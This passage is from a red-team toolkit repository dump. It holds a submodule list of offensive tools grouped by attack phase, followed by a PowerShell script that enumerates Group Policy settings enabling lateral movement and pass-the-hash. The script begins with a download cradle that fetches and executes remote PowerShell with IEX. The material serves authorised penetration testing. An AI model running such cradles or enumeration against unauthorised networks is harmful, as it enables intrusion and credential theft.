https://github.com/danielbohannon/Invoke-CradleCrafter.git 109 | [submodule "Initial_access/Payload_generation/Invoke-Obfuscation"] 110 | path = Initial_access/Payload_generation/Invoke-Obfuscation 111 | url = https://github.com/danielbohannon/Invoke-Obfuscation.git 112 | [submodule "Command_and_control/WMImplant"] 113 | path = Command_and_control/WMImplant 114 | url = https://github.com/ChrisTruncer/WMImplant.git 115 | [submodule "Lateral_movement/WMIOps"] 116 | path = Lateral_movement/WMIOps 117 | url = https://github.com/ChrisTruncer/WMIOps.git 118 | [submodule "Initial_access/Payload_generation/Veil"] 119 | path = Initial_access/Payload_generation/Veil 120 | url = https://github.com/Veil-Framework/Veil.git 121 | [submodule "Command_and_control/Cobalt_strike/Aggressor/Aggressor-scripts"] 122 | path = Command_and_control/Cobalt_strike/Aggressor/Aggressor-scripts 123 | url = https://github.com/Und3rf10w/Aggressor-scripts.git 124 | [submodule "Command_and_control/Cobalt_strike/Aggressor/AggressorScripts"] 125 | path = Command_and_control/Cobalt_strike/Aggressor/AggressorScripts 126 | url = https://github.com/harleyQu1nn/AggressorScripts.git 127 | [submodule "Command_and_control/Cobalt_strike/Aggressor/bluescreenofjeff"] 128 | path = Command_and_control/Cobalt_strike/Aggressor/bluescreenofjeff 129 | url = https://github.com/bluscreenofjeff/AggressorScripts.git 130 | [submodule "Command_and_control/Cobalt_strike/Aggressor/persistence-aggressor-script"] 131 | path = Command_and_control/Cobalt_strike/Aggressor/persistence-aggressor-script 132 | url = https://github.com/ZonkSec/persistence-aggressor-script.git 133 | [submodule "Command_and_control/Empire"] 134 | path = Command_and_control/Empire 135 | url = https://github.com/EmpireProject/Empire.git 136 | [submodule "Lateral_movement/mimikatz"] 137 | path = Lateral_movement/mimikatz 138 | url = https://github.com/gentilkiwi/mimikatz.git 139 | [submodule "Command_and_control/trevorc2"] 140 | path = Command_and_control/trevorc2 141 | url = https://github.com/trustedsec/trevorc2.git 142 | [submodule "Establish_foothold/UACME"] 143 | path = Establish_foothold/UACME 144 | url = https://github.com/darkoperator/UACME.git 145 | [submodule "Establish_foothold/PowerLurk"] 146 | path = Establish_foothold/PowerLurk 147 | url = https://github.com/Sw4mpf0x/PowerLurk.git 148 | [submodule "Lateral_movement/KeeThief"] 149 | path = Lateral_movement/KeeThief 150 | url = https://github.com/HarmJ0y/KeeThief.git 151 | [submodule "Initial_access/subjack"] 152 | path = Initial_access/subjack 153 | url = https://github.com/haccer/subjack.git 154 | [submodule "Initial_access/Phishing/gophish"] 155 | path = Initial_access/Phishing/gophish 156 | url = https://github.com/gophish/gophish.git 157 | [submodule "Initial_access/Phishing/social-engineer-toolkit"] 158 | path = Initial_access/Phishing/social-engineer-toolkit 159 | url = https://github.com/trustedsec/social-engineer-toolkit.git 160 | [submodule "Initial_access/Phishing/FiercePhish"] 161 | path = Initial_access/Phishing/FiercePhish 162 | url = https://github.com/Raikia/FiercePhish.git 163 | [submodule "References/SadProcessorCheats"] 164 | path = References/SadProcessorCheats 165 | url = https://github.com/SadProcessor/Cheats.git 166 | [submodule "Lateral_movement/red-team-scripts"] 167 | path = Lateral_movement/red-team-scripts 168 | url = https://github.com/threatexpress/red-team-scripts.git 169 | [submodule "Lateral_movement/mimikittenz"] 170 | path = Lateral_movement/mimikittenz 171 | url = https://github.com/putterpanda/mimikittenz.git 172 | [submodule "Reconnaissance/Technology/GitLoot"] 173 | path = Reconnaissance/Technology/GitLoot 174 | url = https://github.com/0xdade/GitLoot.git 175 | [submodule "Initial_access/Payload_generation/macro_pack"] 176 | path = Initial_access/Payload_generation/macro_pack 177 | url = https://github.com/sevagas/macro_pack.git 178 | [submodule "Initial_access/Payload_generation/CheckPlease"] 179 | path = Initial_access/Payload_generation/CheckPlease 180 | url = https://github.com/Arvanaghi/CheckPlease.git 181 | [submodule "Staging/CatMyFish"] 182 | path = Staging/CatMyFish 183 | url = https://github.com/Mr-Un1k0d3r/CatMyFish.git 184 | [submodule "Initial_access/Payload_generation/DKMC"] 185 | path = Initial_access/Payload_generation/DKMC 186 | url = https://github.com/Mr-Un1k0d3r/DKMC 187 | [submodule "Lateral_movement/RedTeamPowershellScripts"] 188 | path = Lateral_movement/RedTeamPowershellScripts 189 | url = https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts.git 190 | [submodule "Lateral_movement/SCT-obfuscator"] 191 | path = Lateral_movement/SCT-obfuscator 192 | url = https://github.com/Mr-Un1k0d3r/SCT-obfuscator.git 193 | [submodule "Lateral_movement/PowerLessShell"] 194 | path = Lateral_movement/PowerLessShell 195 | url = https://github.com/Mr-Un1k0d3r/PowerLessShell.git 196 | [submodule "Command_and_control/Cobalt_strike/Aggressor/ramen0x3f"] 197 | path = Command_and_control/Cobalt_strike/Aggressor/ramen0x3f 198 | url = https://github.com/ramen0x3f/AggressorScripts.git 199 | [submodule "Staging/EvilURL"] 200 | path = Staging/EvilURL 201 | url = https://github.com/UndeadSec/EvilURL.git 202 | [submodule "Reconnaissance/Technology/truffleHog"] 203 | path = Reconnaissance/Technology/truffleHog 204 | url = https://github.com/dxa4481/truffleHog.git 205 | [submodule "Command_and_control/Cobalt_strike/external_c2_framework"] 206 | path = Command_and_control/Cobalt_strike/external_c2_framework 207 | url = https://github.com/Und3rf10w/external_c2_framework.git 208 | [submodule "Command_and_control/Cobalt_strike/ExternalC2"] 209 | path = Command_and_control/Cobalt_strike/ExternalC2 210 | url = https://github.com/ryhanson/ExternalC2.git 211 | [submodule "Initial_access/Phishing/phishery"] 212 | path = Initial_access/Phishing/phishery 213 | url = https://github.com/ryhanson/phishery.git 214 | [submodule "Command_and_control/WSC2"] 215 | path = Command_and_control/WSC2 216 | url = https://github.com/Arno0x/WSC2 217 | [submodule "Lateral_movement/Invoke-PSImage"] 218 | path = Lateral_movement/Invoke-PSImage 219 | url = https://github.com/peewpw/Invoke-PSImage.git 220 | [submodule "Initial_access/Phishing/ReelPhish"] 221 | path = Initial_access/Phishing/ReelPhish 222 | url = https://github.com/fireeye/ReelPhish.git 223 | [submodule "Command_and_control/c2"] 224 | path = Command_and_control/c2 225 | url = https://github.com/averagesecurityguy/c2.git 226 | [submodule "Staging/Red-Team-Infrastructure-Wiki"] 227 | path = Staging/Red-Team-Infrastructure-Wiki 228 | url = https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki.git 229 | [submodule "Staging/Red-Baron"] 230 | path = Staging/Red-Baron 231 | url = https://github.com/Coalfire-Research/Red-Baron.git 232 | [submodule "Reconnaissance/Frameworks/spiderfoot"] 233 | path = Reconnaissance/Frameworks/spiderfoot 234 | url = https://github.com/smicallef/spiderfoot.git 235 | [submodule "Reconnaissance/Frameworks/recon-ng"] 236 | path = Reconnaissance/Frameworks/recon-ng 237 | url = https://bitbucket.org/LaNMaSteR53/recon-ng.git 238 | [submodule "Reconnaissance/FOCA"] 239 | path = Reconnaissance/FOCA 240 | url = https://github.com/ElevenPaths/FOCA.git 241 | [submodule "Lateral_movement/3snake"] 242 | path = Lateral_movement/3snake 243 | url = https://github.com/blendin/3snake.git 244 | [submodule "Initial_access/Payload_generation/luckystrike"] 245 | path = Initial_access/Payload_generation/luckystrike 246 | url = https://github.com/curi0usJack/luckystrike.git 247 | [submodule "Lateral_movement/ntdsxtract"] 248 | path = Lateral_movement/ntdsxtract 249 | url = https://github.com/csababarta/ntdsxtract.git 250 | [submodule "Lateral_movement/mimipenguin"] 251 | path = Lateral_movement/mimipenguin 252 | url = https://github.com/ahhh/mimipenguin.git 253 | [submodule "Staging/catphish"] 254 | path = Staging/catphish 255 | url = https://github.com/ring0lab/catphish.git 256 | [submodule "Staging/Lazy-RedTeamer-Scripts"] 257 | path = Staging/Lazy-RedTeamer-Scripts 258 | url = https://github.com/yeyintminthuhtut/Lazy-RedTeamer-Scripts.git 259 | [submodule "Lateral_movement/Java_deserial/java-deserialization-exploits"] 260 | path = Lateral_movement/Java_deserial/java-deserialization-exploits 261 | url = https://github.com/Coalfire-Research/java-deserialization-exploits.git 262 | [submodule "Initial_access/Payload_generation/SharpShooter"] 263 | path = Initial_access/Payload_generation/SharpShooter 264 | url = https://github.com/mdsecactivebreach/SharpShooter.git 265 | [submodule "Lateral_movement/Internal-Monologue"] 266 | path = Lateral_movement/Internal-Monologue 267 | url = https://github.com/eladshamir/Internal-Monologue.git 268 | [submodule "Lateral_movement/Java_deserial/Java-Deserialization-Cheat-Sheet"] 269 | path = Lateral_movement/Java_deserial/Java-Deserialization-Cheat-Sheet 270 | url = https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet.git 271 | [submodule "Initial_access/Probable-Wordlists"] 272 | path = Initial_access/Probable-Wordlists 273 | url = https://github.com/berzerk0/Probable-Wordlists.git 274 | [submodule "Lateral_movement/DSInternals"] 275 | path = Lateral_movement/DSInternals 276 | url = https://github.com/MichaelGrafnetter/DSInternals.git 277 | [submodule "Lateral_movement/PowerSploitDev"] 278 | path = Lateral_movement/PowerSploitDev 279 | url = https://github.com/PowerShellMafia/PowerSploit.git 280 | [submodule "Initial_access/UltimateAppLockerByPassList"] 281 | path = Initial_access/UltimateAppLockerByPassList 282 | url = https://github.com/api0cradle/UltimateAppLockerByPassList 283 | [submodule "Initial_access/Federated_services/CredKing"] 284 | path = Initial_access/Federated_services/CredKing 285 | url = https://github.com/ustayready/CredKing.git 286 | [submodule "Labs/Invoke-UserSimulator"] 287 | path = Labs/Invoke-UserSimulator 288 | url = https://github.com/ubeeri/Invoke-UserSimulator.git 289 | [submodule "ClickOnceGenerator"] 290 | path = ClickOnceGenerator 291 | url = https://github.com/Mr-Un1k0d3r/ClickOnceGenerator.git 292 | [submodule "Initial_access/Payload_generation/ClickOnceGenerator"] 293 | path = Initial_access/Payload_generation/ClickOnceGenerator 294 | url = https://github.com/Mr-Un1k0d3r/ClickOnceGenerator.git 295 | [submodule "Labs/Invoke-ADLabDeployer"] 296 | path = Labs/Invoke-ADLabDeployer 297 | url = https://github.com/outflanknl/Invoke-ADLabDeployer.git 298 | [submodule "Lateral_movement/ShellIntelScripts"] 299 | path = Lateral_movement/ShellIntelScripts 300 | url = https://github.com/Shellntel/scripts.git 301 | [submodule "Initial_access/PoSHBypass"] 302 | path = Initial_access/PoSHBypass 303 | url = https://github.com/davehardy20/PoSHBypass.git 304 | [submodule "Reconnaissance/Technology/goGetBucket"] 305 | path = Reconnaissance/Technology/goGetBucket 306 | url = https://github.com/glen-mac/goGetBucket.git 307 | [submodule "Lateral_movement/d8072d730b24fbae6ffe3aed8ca9c407"] 308 | path = Lateral_movement/d8072d730b24fbae6ffe3aed8ca9c407 309 | url = https://gist.github.com/d8072d730b24fbae6ffe3aed8ca9c407.git 310 | [submodule "Lateral_movement/credgrap_ie_edge"] 311 | path = Lateral_movement/credgrap_ie_edge 312 | url = https://github.com/HanseSecure/credgrap_ie_edge.git 313 | [submodule "Initial_access/aws_pwn"] 314 | path = Initial_access/aws_pwn 315 | url = https://github.com/dagrz/aws_pwn.git 316 | [submodule "Reconnaissance/People/prowl"] 317 | path = Reconnaissance/People/prowl 318 | url = https://github.com/nettitude/prowl 319 | [submodule "Command_and_control/ideas/f468d34e81795239a8f8bac03646cf59"] 320 | path = Command_and_control/ideas/f468d34e81795239a8f8bac03646cf59 321 | url = https://gist.github.com/f468d34e81795239a8f8bac03646cf59.git 322 | [submodule "Initial_access/31b2bbc5f129650c2a67bb40d14282ab"] 323 | path = Initial_access/31b2bbc5f129650c2a67bb40d14282ab 324 | url = https://gist.github.com/31b2bbc5f129650c2a67bb40d14282ab.git 325 | [submodule "Initial_access/example-hta"] 326 | path = Initial_access/example-hta 327 | url = https://gist.github.com/31b2bbc5f129650c2a67bb40d14282ab.git 328 | [submodule "Staging/htaccess"] 329 | path = Staging/htaccess 330 | url = https://gist.github.com/leoloobeek/bc82e68af027b2f876527406c04ae68d 331 | [submodule "Reconnaissance/People/LinkedInScrape-js"] 332 | path = Reconnaissance/People/LinkedInScrape-js 333 | url = https://gist.github.com/d9b7f380336b298c2b744de389f3c47d.git 334 | [submodule "Staging/mkhtaccess_red"] 335 | path = Staging/mkhtaccess_red 336 | url = https://github.com/violentlydave/mkhtaccess_red.git 337 | [submodule "Reconnaissance/Frameworks/omnibus"] 338 | path = Reconnaissance/Frameworks/omnibus 339 | url = https://github.com/InQuest/omnibus.git 340 | [submodule "Initial_access/poc-iqy"] 341 | path = Initial_access/poc-iqy 342 | url = https://gist.github.com/Mr-Un1k0d3r/4ed3e3e0416fbbd1fd015119359eb961 343 | [submodule "Initial_access/poc-iqy-remote"] 344 | path = Initial_access/poc-iqy-remote 345 | url = https://gist.github.com/Mr-Un1k0d3r/abdcf16ebcef5842c7f79ee6686271e7 346 | [submodule "Initial_access/Targeting/office365userenum"] 347 | path = Initial_access/Targeting/office365userenum 348 | url = https://bitbucket.org/grimhacker/office365userenum.git 349 | [submodule "Lateral_movement/GhostPack/SharpDPAPI"] 350 | path = Lateral_movement/GhostPack/SharpDPAPI 351 | url = https://github.com/GhostPack/SharpDPAPI.git 352 | [submodule "Lateral_movement/GhostPack/Seatbelt"] 353 | path = Lateral_movement/GhostPack/Seatbelt 354 | url = https://github.com/GhostPack/Seatbelt.git 355 | [submodule "Lateral_movement/GhostPack/SharpUp"] 356 | path = Lateral_movement/GhostPack/SharpUp 357 | url = https://github.com/GhostPack/SharpUp.git 358 | [submodule "Lateral_movement/GhostPack/SharpDump"] 359 | path = Lateral_movement/GhostPack/SharpDump 360 | url = https://github.com/GhostPack/SharpDump.git 361 | [submodule "Lateral_movement/GhostPack/SafetyKatz"] 362 | path = Lateral_movement/GhostPack/SafetyKatz 363 | url = https://github.com/GhostPack/SafetyKatz.git 364 | [submodule "Lateral_movement/GhostPack/SharpWMI"] 365 | path = Lateral_movement/GhostPack/SharpWMI 366 | url = https://github.com/GhostPack/SharpWMI.git 367 | [submodule "Lateral_movement/GhostPack/SharpRoast"] 368 | path = Lateral_movement/GhostPack/SharpRoast 369 | url = https://github.com/GhostPack/SharpRoast.git 370 | [submodule "Labs/atomic-red-team"] 371 | path = Labs/atomic-red-team 372 | url = https://github.com/redcanaryco/atomic-red-team.git 373 | [submodule "Reconnaissance/Technology/spoofcheck"] 374 | path = Reconnaissance/Technology/spoofcheck 375 | url = https://github.com/BishopFox/spoofcheck 376 | [submodule "Initial_access/SigThief"] 377 | path = Initial_access/SigThief 378 | url = https://github.com/secretsquirrel/SigThief.git 379 | [submodule "Initial_access/metatwin"] 380 | path = Initial_access/metatwin 381 | url = https://github.com/threatexpress/metatwin 382 | [submodule "Initial_access/PSAmsi"] 383 | path = Initial_access/PSAmsi 384 | url = https://github.com/cobbr/PSAmsi 385 | [submodule "Initial_access/SpookFlare"] 386 | path = Initial_access/SpookFlare 387 | url = https://github.com/hlldz/SpookFlare.git 388 | [submodule "Initial_access/Phishing/PhishingPretexts"] 389 | path = Initial_access/Phishing/PhishingPretexts 390 | url = https://github.com/L4bF0x/PhishingPretexts 391 | [submodule "Command_and_control/merlin"] 392 | path = Command_and_control/merlin 393 | url = https://github.com/Ne0nd0g/merlin 394 | [submodule "Staging/DomainFrontDiscover"] 395 | path = Staging/DomainFrontDiscover 396 | url = https://github.com/peewpw/DomainFrontDiscover 397 | [submodule "References/Red-Teaming-Toolkit"] 398 | path = References/Red-Teaming-Toolkit 399 | url = https://github.com/infosecn1nja/Red-Teaming-Toolkit 400 | [submodule "Reconnaissance/People/GatherContacts"] 401 | path = Reconnaissance/People/GatherContacts 402 | url = https://github.com/clr2of8/GatherContacts.git 403 | -------------------------------------------------------------------------------- /Lateral_movement/PowerView-with-RemoteAccessPolicyEnumeration.ps1: -------------------------------------------------------------------------------- 1 | #requires -version 2 2 | 3 | # PowerView extensions for enumerating remote access policies through group policy. 4 | # William Knowles (@william_knows) and Jon Cave (@joncave) 5 | # For more details, see: https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo 6 | 7 | # The following PowerView extensions were based on the code from commit be932ce 8 | # Obtain a copy of this ... 9 | IEX (New-Object Net.Webclient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/be932ce2be3e2a574c403f1635057029e176f858/Recon/PowerView.ps1") 10 | 11 | function Find-ComputersWithRemoteAccessPolicies { 12 | <# 13 | .SYNOPSIS 14 | 15 | Returns the DNS hostnames of computers with remote access policies relevant to lateral movement. 16 | 17 | .DESCRIPTION 18 | 19 | Checks GPO for settings which deal with remote access policies relevant to lateral movement 20 | (e.g., "EnableLUA" and "LocalAccountTokenFilterPolicy"). The OUs to which these GPOs are applied 21 | are then identified, and then the computer objects from each are retrieved. Note that this only 22 | retrieves computer objects who have had the relevent registry keys set through group policy. 23 | 24 | .PARAMETER Domain 25 | 26 | Specifies the domain to use for the query, defaults to the current domain. 27 | 28 | .PARAMETER SearchBase 29 | 30 | The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" 31 | Useful for OU queries. 32 | 33 | .PARAMETER SearchScope 34 | 35 | Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). 36 | 37 | .PARAMETER Server 38 | 39 | Specifies an Active Directory server (domain controller) to bind to. 40 | 41 | .PARAMETER ResultPageSize 42 | 43 | Specifies the PageSize to set for the LDAP searcher object. 44 | 45 | .PARAMETER ServerTimeLimit 46 | 47 | Specifies the maximum amount of time the server spends searching. Default of 120 seconds. 48 | 49 | .PARAMETER Credential 50 | 51 | A [Management.Automation.PSCredential] object of alternate credentials 52 | for connection to the target domain. 53 | 54 | .EXAMPLE 55 | 56 | PS C:\> Find-ComputersWithRemoteAccessPolicies 57 | 58 | Returns the DNS hostnames for computer objects that have GPOs applied which may enable lateral movement. 59 | 60 | .EXAMPLE 61 | 62 | PS C:\> Find-ComputersWithRemoteAccessPolicies -Domain dev.testlab.local 63 | 64 | Returns the DNS hostnames for computer objects that have GPOs applied which may enable lateral movement. Limit to a particular domain. 65 | 66 | .EXAMPLE 67 | 68 | PS C:\> Find-ComputersWithRemoteAccessPolicies -SearchBase "OU=secret,DC=testlab,DC=local" 69 | 70 | Returns the DNS hostnames for computer objects that have GPOs applied which may enable lateral movement. Limit to a particular organisational unit. 71 | 72 | #> 73 | 74 | [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] 75 | [CmdletBinding()] 76 | Param( 77 | [ValidateNotNullOrEmpty()] 78 | [String] 79 | $Domain, 80 | 81 | [ValidateNotNullOrEmpty()] 82 | [Alias('ADSPath')] 83 | [String] 84 | $SearchBase, 85 | 86 | [ValidateSet('Base', 'OneLevel', 'Subtree')] 87 | [String] 88 | $SearchScope = 'Subtree', 89 | 90 | [ValidateNotNullOrEmpty()] 91 | [Alias('DomainController')] 92 | [String] 93 | $Server, 94 | 95 | [ValidateRange(1, 10000)] 96 | [Int] 97 | $ResultPageSize = 200, 98 | 99 | [ValidateRange(1, 10000)] 100 | [Int] 101 | $ServerTimeLimit, 102 | 103 | [Management.Automation.PSCredential] 104 | [Management.Automation.CredentialAttribute()] 105 | $Credential = [Management.Automation.PSCredential]::Empty 106 | 107 | ) 108 | 109 | BEGIN { 110 | $SearcherArguments = @{} 111 | if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } 112 | if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $Domain } 113 | if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } 114 | if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase} 115 | if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope} 116 | if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } 117 | if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } 118 | if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } 119 | 120 | } 121 | 122 | PROCESS { 123 | 124 | $ComputerObjectsWithRemoteAccessPolicies = New-Object PSObject 125 | $ComputerObjectsWithRemoteAccessPolicies | Add-Member NoteProperty EnableLUA (New-Object System.Collections.Generic.List[System.Object]) 126 | $ComputerObjectsWithRemoteAccessPolicies | Add-Member NoteProperty FilterAdministratorToken (New-Object System.Collections.Generic.List[System.Object]) 127 | $ComputerObjectsWithRemoteAccessPolicies | Add-Member NoteProperty LocalAccountTokenFilterPolicy (New-Object System.Collections.Generic.List[System.Object]) 128 | $ComputerObjectsWithRemoteAccessPolicies | Add-Member NoteProperty SeDenyNetworkLogonRight (New-Object System.Collections.Generic.List[System.Object]) 129 | $ComputerObjectsWithRemoteAccessPolicies | Add-Member NoteProperty SeDenyRemoteInteractiveLogonRight (New-Object System.Collections.Generic.List[System.Object]) 130 | 131 | $gpoSearchArguments = @{} 132 | $gpoSearchArguments = $gpoSearchArguments + $SearcherArguments 133 | $gpoSearchArguments.Remove("SearchBase") 134 | $gpoSearchArguments.Remove("SearchScope") 135 | # NOTE: SearchBase is removed here, as we do not wish it to be applied to the initial call to Get-DomainGPORemoteAccessPolicy 136 | # and instead for the search to be conducted across the domain 137 | $RemoteAccessPolicies = Get-DomainGPORemoteAccessPolicy @gpoSearchArguments 138 | 139 | $RemoteAccessPolicies.PSObject.Properties | ForEach-Object { 140 | $policy = $_.Name # EnableLUA, etc 141 | foreach ($guid in $RemoteAccessPolicies.$policy) { 142 | # set arguments for OU search (reading $SearchBase to limit the scope) 143 | $ouSearchArguments = @{} 144 | $ouSearchArguments = $ouSearchArguments + $SearcherArguments 145 | $ouSearchArguments['GPLink'] = $guid 146 | Get-DomainOU @ouSearchArguments | ForEach-Object { 147 | $compSearchArguments = @{} 148 | $compSearchArguments = $compSearchArguments + $SearcherArguments 149 | $compSearchArguments['SearchBase'] = $_.distinguishedname 150 | $OUComputers = Get-DomainComputer @compSearchArguments 151 | $OUComputers | ForEach-Object { 152 | if ($ComputerObjectsWithRemoteAccessPolicies.$policy -notcontains $_.dnshostname) { $ComputerObjectsWithRemoteAccessPolicies.$policy += $_.dnshostname } 153 | } 154 | } 155 | } 156 | } 157 | } 158 | 159 | END { 160 | return $ComputerObjectsWithRemoteAccessPolicies 161 | } 162 | } 163 | 164 | function Get-DomainGPORemoteAccessPolicy { 165 | <# 166 | .SYNOPSIS 167 | 168 | Enumerates GPOs that control settings that deal with remote access policies. 169 | 170 | .DESCRIPTION 171 | 172 | Checks GPO for five different remote access policies. Three which relate to User 173 | Account Control (UAC) and two which relate to User Rights Assignment (URA). 174 | The three UAC policies are: 175 | (1) "EnableLUA" which controls "Admin Approval Mode" for the local administrator group. 176 | When set to 0 UAC is disabled. This setting can be controlled by group policy directly 177 | and is stored in "GptTmpl.inf". 178 | (2) "FilterAdministratorToken" controls "Admin Approval Mode" for the RID 500 account. 179 | When set to 0 remote connections for the RID 500 account will be granted a high 180 | integrity token. This setting is disabled by default. This setting can be controlled 181 | by group policy directly and is stored in "GptTmpl.inf". 182 | (3) "LocalAccountTokenFilterPolicy" controls token integrity for remote connections. 183 | When set to 1 all remote connections for local users in the local administrator group 184 | will be granted a high integrity token. This setting can only be set through a custom 185 | registry key and is stored in "Registry.xml". 186 | The order of precedence for the above three UAC commands is: EnableLUA, 187 | LocalAccountTokenFilterPolicy, FilterAdministratorToken. For example, for 188 | FilterAdministratorToken to have an effect EnableLUA would need to be set to 1, and 189 | LocalAccountTokenFilterPolicy to 0. 190 | The two URA policies are: 191 | (4) and (5) "SeDenyNetworkLogonRight" and "SeDenyRemoteInteractiveLogonRight" are 192 | checked to see if they include the SID of the built-in Administrators group. If they 193 | do, any member of this group can not be used to perform network or remote interactive 194 | authentication against the computer object on which they are configured. 195 | 196 | .PARAMETER Identity 197 | 198 | A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'), 199 | GUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted. 200 | 201 | .PARAMETER Domain 202 | 203 | Specifies the domain to use for the query, defaults to the current domain. 204 | 205 | .PARAMETER LDAPFilter 206 | 207 | Specifies an LDAP query string that is used to filter Active Directory objects. 208 | 209 | .PARAMETER SearchBase 210 | 211 | The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" 212 | Useful for OU queries. 213 | 214 | .PARAMETER Server 215 | 216 | Specifies an Active Directory server (domain controller) to bind to. 217 | 218 | .PARAMETER SearchScope 219 | 220 | Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). 221 | 222 | .PARAMETER ResultPageSize 223 | 224 | Specifies the PageSize to set for the LDAP searcher object. 225 | 226 | .PARAMETER ServerTimeLimit 227 | 228 | Specifies the maximum amount of time the server spends searching. Default of 120 seconds. 229 | 230 | .PARAMETER Credential 231 | 232 | A [Management.Automation.PSCredential] object of alternate credentials 233 | for connection to the target domain. 234 | 235 | .EXAMPLE 236 | 237 | Get-DomainGPORemoteAccessPolicy 238 | 239 | Returns an object where the key is the remote access policy, and the value is 240 | a list of GPOs which set the policy. 241 | 242 | #> 243 | 244 | [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] 245 | [CmdletBinding()] 246 | Param( 247 | [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 248 | [Alias('DistinguishedName', 'SamAccountName', 'Name')] 249 | [String[]] 250 | $Identity, 251 | 252 | [ValidateNotNullOrEmpty()] 253 | [String] 254 | $Domain, 255 | 256 | [ValidateNotNullOrEmpty()] 257 | [Alias('Filter')] 258 | [String] 259 | $LDAPFilter, 260 | 261 | [ValidateNotNullOrEmpty()] 262 | [Alias('ADSPath')] 263 | [String] 264 | $SearchBase, 265 | 266 | [ValidateSet('Base', 'OneLevel', 'Subtree')] 267 | [String] 268 | $SearchScope = 'Subtree', 269 | 270 | [ValidateNotNullOrEmpty()] 271 | [Alias('DomainController')] 272 | [String] 273 | $Server, 274 | 275 | [ValidateRange(1, 10000)] 276 | [Int] 277 | $ResultPageSize = 200, 278 | 279 | [ValidateRange(1, 10000)] 280 | [Int] 281 | $ServerTimeLimit, 282 | 283 | [Management.Automation.PSCredential] 284 | [Management.Automation.CredentialAttribute()] 285 | $Credential = [Management.Automation.PSCredential]::Empty 286 | ) 287 | 288 | BEGIN { 289 | $SearcherArguments = @{} 290 | if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } 291 | if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $Domain } 292 | if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } 293 | if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } 294 | if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } 295 | if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } 296 | if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } 297 | if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } 298 | 299 | $ConvertArguments = @{} 300 | if ($PSBoundParameters['Domain']) { $ConvertArguments['Domain'] = $Domain } 301 | if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server } 302 | if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential } 303 | 304 | $SplitOption = [System.StringSplitOptions]::RemoveEmptyEntries 305 | } 306 | 307 | PROCESS { 308 | if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } 309 | 310 | $RemoteAccessPolicies = New-Object PSObject 311 | $RemoteAccessPolicies | Add-Member NoteProperty EnableLUA (New-Object System.Collections.Generic.List[System.Object]) 312 | $RemoteAccessPolicies | Add-Member NoteProperty FilterAdministratorToken (New-Object System.Collections.Generic.List[System.Object]) 313 | $RemoteAccessPolicies | Add-Member NoteProperty LocalAccountTokenFilterPolicy (New-Object System.Collections.Generic.List[System.Object]) 314 | $RemoteAccessPolicies | Add-Member NoteProperty SeDenyNetworkLogonRight (New-Object System.Collections.Generic.List[System.Object]) 315 | $RemoteAccessPolicies | Add-Member NoteProperty SeDenyRemoteInteractiveLogonRight (New-Object System.Collections.Generic.List[System.Object]) 316 | 317 | # get every GPO from the specified domain 318 | Get-DomainGPO @SearcherArguments | ForEach-Object { 319 | 320 | $GPOdisplayName = $_.displayname 321 | $GPOname = $_.name 322 | $GPOPath = $_.gpcfilesyspath 323 | 324 | # EnableLUA and FilterAdministratorToken check via GptTmpl.inf 325 | $ParseArgs = @{ 'GptTmplPath' = "$GPOPath\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" } 326 | if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential } 327 | # parse the GptTmpl.inf file (if it exists) for this GPO 328 | $Inf = Get-GptTmpl @ParseArgs 329 | if($Inf -and ($Inf.psbase.Keys -contains "Registry Values")) 330 | { 331 | $EnableLUA = $Inf["Registry Values"]["MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"] 332 | if ($EnableLUA -and ($EnableLUA[0] -eq 4) -and ($EnableLUA[1] -eq 0)) 333 | { 334 | Write-Verbose "The following GPO enables pass-the-hash by disabling EnableLUA: $GPOdisplayName - $GPOname" 335 | # append to EnableLUA GPO list if it is not already there 336 | if ($RemoteAccessPolicies.EnableLUA -notcontains $GPOname) { $RemoteAccessPolicies.EnableLUA += $GPOname } 337 | } 338 | 339 | $FilterAdministratorToken = $Inf["Registry 